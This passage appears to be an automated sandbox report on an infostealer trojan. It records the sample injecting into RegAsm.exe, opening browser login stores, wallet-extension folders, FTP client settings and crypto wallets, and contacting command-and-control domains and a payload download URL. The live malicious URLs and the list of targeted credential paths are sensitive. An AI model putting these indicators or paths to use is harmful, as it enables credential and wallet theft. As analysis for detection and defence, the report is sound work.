          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6484, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation
          1
          DLL Side-Loading
          411
          Process Injection
          1
          Masquerading
          2
          OS Credential Dumping
          121
          Security Software Discovery
          Remote Services1
          Screen Capture
          21
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          11
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell
          Logon Script (Windows)Logon Script (Windows)131
          Virtualization/Sandbox Evasion
          Security Account Manager131
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares31
          Data from Local System
          3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
          Process Injection
          NTDS1
          File and Directory Discovery
          Distributed Component Object Model2
          Clipboard Data
          124
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information
          LSA Secrets22
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
          Obfuscated Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Timestomp
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555620 Sample: nlJ2sNaZVi.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 100 32 thinkyyokej.sbs 2->32 34 tamedgeesy.sbs 2->34 36 9 other IPs or domains 2->36 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus detection for URL or domain 2->48 50 13 other signatures 2->50 8 nlJ2sNaZVi.exe 15 10 2->8         started        signatures3 process4 dnsIp5 38 147.45.44.131, 49704, 80 FREE-NET-ASFREEnetEU Russian Federation 8->38 26 C:\Users\user\AppData\...\v0t1l0co.cmdline, Unicode 8->26 dropped 28 C:\Users\user\AppData\Local\...\v0t1l0co.0.cs, Unicode 8->28 dropped 30 C:\Users\user\AppData\...\nlJ2sNaZVi.exe.log, CSV 8->30 dropped 52 Writes to foreign memory regions 8->52 54 Allocates memory in foreign processes 8->54 56 Compiles code for process injection (via .Net compiler) 8->56 58 2 other signatures 8->58 13 RegAsm.exe 8->13         started        17 csc.exe 3 8->17         started        file6 signatures7 process8 dnsIp9 40 netwrokenb.cyou 188.114.96.3, 443, 49705, 49707 CLOUDFLARENETUS European Union 13->40 42 steamcommunity.com 104.102.49.254, 443, 49706 AKAMAI-ASUS United States 13->42 60 Query firmware table information (likely to detect VMs) 13->60 62 Tries to harvest and steal ftp login credentials 13->62 64 Tries to harvest and steal browser information (history, passwords, etc) 13->64 66 Tries to steal Crypto Currency Wallets 13->66 24 C:\Users\user\AppData\Local\...\v0t1l0co.dll, PE32 17->24 dropped 20 conhost.exe 17->20         started        22 cvtres.exe 1 17->22         started        file10 signatures11 process12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          nlJ2sNaZVi.exe55%ReversingLabsByteCode-MSIL.Trojan.Zilla
          nlJ2sNaZVi.exe100%AviraHEUR/AGEN.1306918
          nlJ2sNaZVi.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll100%AviraHEUR/AGEN.1300034
          C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://147.45.44.1310%Avira URL Cloudsafe
          https://marshal-zhukov.com/apiya100%Avira URL Cloudmalware
          netwrokenb.cyou0%Avira URL Cloudsafe
          https://netwrokenb.cyou/api0%Avira URL Cloudsafe
          https://marshal-zhukov.com:443/apiicrosoft100%Avira URL Cloudmalware
          http://147.45.44.131/infopage/tbh75.exeP0%Avira URL Cloudsafe
          http://147.45.44.131/infopage/tbh75.exe100%Avira URL Cloudmalware
          https://marshal-zhukov.com:443/apiK100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          steamcommunity.com
          104.102.49.254
          truefalse
            high
            marshal-zhukov.com
            188.114.96.3
            truefalse
              high
              netwrokenb.cyou
              188.114.96.3
              truetrue
                unknown
                rottieud.sbs
                unknown
                unknowntrue
                  unknown
                  tamedgeesy.sbs
                  unknown
                  unknowntrue
                    unknown
                    brownieyuz.sbs
                    unknown
                    unknowntrue
                      unknown
                      repostebhu.sbs
                      unknown
                      unknownfalse
                        high
                        explainvees.sbs
                        unknown
                        unknowntrue
                          unknown
                          relalingj.sbs
                          unknown
                          unknowntrue
                            unknown
                            thinkyyokej.sbs
                            unknown
                            unknowntrue
                              unknown
                              ducksringjk.sbs
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                tamedgeesy.sbsfalse
                                  high
                                  rottieud.sbsfalse
                                    high
                                    https://steamcommunity.com/profiles/76561199724331900false
                                      high
                                      repostebhu.sbsfalse
                                        high
                                        thinkyyokej.sbsfalse
                                          high
                                          netwrokenb.cyoutrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          ducksringjk.sbsfalse
                                            high
                                            https://netwrokenb.cyou/apitrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            brownieyuz.sbsfalse
                                              high
                                              https://marshal-zhukov.com/apifalse
                                                high
                                                http://147.45.44.131/infopage/tbh75.exetrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                relalingj.sbsfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://player.vimeo.comRegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://recaptcha.netRegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.gstatic.cn/recaptcha/RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://sketchfab.comRegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://recaptcha.net/recaptcha/;RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.youtube.com/RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://147.45.44.131nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002FFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.youtube.comRegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.comRegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://147.45.44.131/infopage/tbh75.exePnlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://medal.tvRegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://marshal-zhukov.com/apiyaRegAsm.exe, 00000005.00000002.2210006355.0000000000C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://store.steampowered.com/;Persist#RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://marshal-zhukov.com:443/apiicrosoftRegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://www.google.com/recaptcha/RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://api.steampowered.com/RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://marshal-zhukov.com/RegAsm.exe, 00000005.00000002.2210006355.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209520966.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209577928.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://marshal-zhukov.com:443/apiRegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://s.ytimg.com;RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://marshal-zhukov.com:443/apiKRegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002FFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://store.steampowered.com/;RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.cloudflare.steamstatic.com/RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        147.45.44.131
                                                                                        unknownRussian Federation
                                                                                        2895FREE-NET-ASFREEnetEUtrue
                                                                                        188.114.96.3
                                                                                        marshal-zhukov.comEuropean Union
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.102.49.254
                                                                                        steamcommunity.comUnited States
                                                                                        16625AKAMAI-ASUSfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1555620
                                                                                        Start date and time:2024-11-14 08:07:28 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 5m 14s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:8
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:nlJ2sNaZVi.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:5e443f31b2cf8b956afec50ad5c0f839.exe
                                                                                        Detection:MAL
